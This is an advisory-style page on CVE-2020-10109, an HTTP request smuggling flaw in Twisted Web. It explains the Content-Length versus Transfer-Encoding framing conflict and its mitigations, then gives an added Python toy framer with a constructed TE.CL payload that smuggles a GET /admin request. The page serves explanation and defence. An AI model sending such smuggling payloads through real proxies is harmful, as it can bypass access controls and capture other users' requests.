CVE-2020-10109 in Twisted Web
Summary
by MITRE
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.
Analysis
by VulDB Data Team • 11/26/2024
The vulnerability identified as CVE-2020-10109 is an HTTP request splitting (request smuggling) flaw in Twisted Web, affecting releases through 19.10.0. It arises from improper handling of conflicting message-framing headers: when a request carried both a Content-Length header and a Transfer-Encoding: chunked header, Twisted's parser honoured Content-Length. RFC 7230 section 3.3.3 gives Transfer-Encoding precedence in that situation (and allows the server to reject the message instead), so the bytes beyond the Content-Length count, which a compliant front end would have treated as part of the chunked body, were parsed by Twisted as the beginning of a new pipelined request.
The flaw is classified as CWE-444 (Inconsistent Interpretation of HTTP Requests, "HTTP Request Smuggling"), which covers parsers that frame the same message differently from the components in front of them. An attacker exploits it by sending a request that carries both headers through a front end (reverse proxy, load balancer, CDN edge) that frames by Transfer-Encoding. The front end forwards the whole chunked body as one request; Twisted reads only the number of bytes given by Content-Length and treats the remainder as a second request that the front end never inspected. That second request is processed on the same backend connection, so it can bypass front-end routing or access controls and, depending on the deployment, be prefixed onto the next request that arrives on that connection.
The operational impact therefore depends on what sits in front of Twisted. Where requests reach Twisted directly from the client, the client already controls every byte of the stream and splitting it typically gains nothing beyond sending two requests outright. Where a proxy or load balancer shares backend connections between users, a smuggled request prefix can capture another user's request data (including session cookies), poison shared caches, or reach endpoints the front end was meant to restrict. Web applications that rely on Twisted Web behind such intermediaries are the population at risk.
Mitigation should focus on upgrading to Twisted 20.3.0 or later, where a request carrying both Content-Length and Transfer-Encoding is rejected with 400 Bad Request and the connection is closed, rather than being framed by either header. Where an upgrade is delayed, the front end should be configured to reject, or to normalise to a single framing header, any request that carries both, so that every hop frames the message the same way; a web application firewall rule that blocks requests containing both headers is a reasonable stopgap, but the check must run on the same bytes the backend will see. Exploitation of this flaw maps to ATT&CK technique T1190 (Exploit Public-Facing Application).
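To make the framing difference concrete, here is an added example (not Twisted's code, and not part of the VulDB analysis): a toy HTTP/1.1 request framer with three selectable policies, the Content-Length-first behaviour described above for Twisted Web through 19.10.0, the RFC 7230 precedence rule, and the reject-with-400 behaviour of the fix, run over a constructed TE.CL payload. The names frame_requests, outcome, SMUGGLED and ATTACK, the payload bytes and the hostname example.test are all assumptions of this example; the framer ignores chunk trailers and other details a real server handles.

```python
"""Toy HTTP/1.1 request framer illustrating CVE-2020-10109 style request splitting.

Added example, not Twisted's own code.  The three framing policies model:
  "content-length-wins"     Twisted Web through 19.10.0 (the vulnerable behaviour)
  "transfer-encoding-wins"  the RFC 7230 section 3.3.3 precedence rule
  "reject"                  Twisted Web 20.3.0 and later (400 Bad Request)
"""
from dataclasses import dataclass


class BadRequest(Exception):
    """Raised where a real server would answer 400 and close the connection."""


@dataclass
class Request:
    method: str
    target: str
    headers: dict  # lowercased name -> list of values, in arrival order
    body: bytes


def _parse_head(data: bytes):
    """Split the request line and headers off the front of a byte stream."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise BadRequest("incomplete request head")
    lines = head.split(b"\r\n")
    try:
        method, target, _version = lines[0].split(b" ", 2)
    except ValueError:
        raise BadRequest("malformed request line") from None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower().decode(), []).append(value.strip().decode())
    return method.decode(), target.decode(), headers, rest


def _read_chunked(rest: bytes):
    """Decode a chunked body (no trailers); return (body, bytes left unread)."""
    body = bytearray()
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0].decode(), 16)
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")  # blank line ends the body
            return bytes(body), rest
        body += rest[:size]
        rest = rest[size + 2:]  # skip the chunk data and its trailing CRLF


def frame_requests(data: bytes, policy: str) -> list:
    """Split one connection's byte stream into pipelined requests under `policy`."""
    requests = []
    while data:
        method, target, headers, rest = _parse_head(data)
        has_cl = "content-length" in headers
        has_te = any(v.lower() == "chunked" for v in headers.get("transfer-encoding", []))
        if has_cl and has_te:
            if policy == "reject":
                raise BadRequest("Content-Length and Transfer-Encoding both present")
            use_cl = policy == "content-length-wins"
        else:
            use_cl = has_cl
        if use_cl:
            length = int(headers["content-length"][0])
            body, rest = rest[:length], rest[length:]
        elif has_te:
            body, rest = _read_chunked(rest)
        else:
            body = b""
        requests.append(Request(method, target, headers, body))
        data = rest
    return requests


# Constructed TE.CL payload (assumption of this example).  A front end that
# frames by Transfer-Encoding forwards one request with a 62-byte chunked body;
# a server that frames by Content-Length reads only the 4-byte chunk-size line
# and then parses the chunk data as a second, attacker-chosen request.
SMUGGLED = (b"GET /admin HTTP/1.1\r\n"
            b"Host: example.test\r\n"
            b"Content-Length: 7\r\n"  # swallows the trailing "\r\n0\r\n\r\n"
            b"\r\n")
CHUNK_SIZE = f"{len(SMUGGLED):x}".encode()  # b"3e": 62 bytes, two hex digits
ATTACK = b"".join([
    b"POST /upload HTTP/1.1\r\n",
    b"Host: example.test\r\n",
    b"Content-Length: 4\r\n",  # covers exactly "3e\r\n"
    b"Transfer-Encoding: chunked\r\n",
    b"\r\n",
    CHUNK_SIZE, b"\r\n", SMUGGLED, b"\r\n",
    b"0\r\n", b"\r\n",
])


def outcome(policy: str):
    """(method, target) of each request the server would act on, or the 400 text."""
    try:
        return [(r.method, r.target) for r in frame_requests(ATTACK, policy)]
    except BadRequest as exc:
        return f"400 Bad Request: {exc}"


if __name__ == "__main__":
    for policy in ("content-length-wins", "transfer-encoding-wins", "reject"):
        print(f"{policy:24} -> {outcome(policy)}")
```

Under "content-length-wins" the stream yields two requests, POST /upload and a GET /admin that the front end never saw as a request; under "transfer-encoding-wins" it yields a single POST whose body happens to contain HTTP syntax; under "reject" the parser refuses the message before any body is read, which is the behaviour the fix adopts. The smuggled request carries its own Content-Length of 7 so that it swallows the chunk terminator and the backend's stream is left clean, a detail real TE.CL payloads also need.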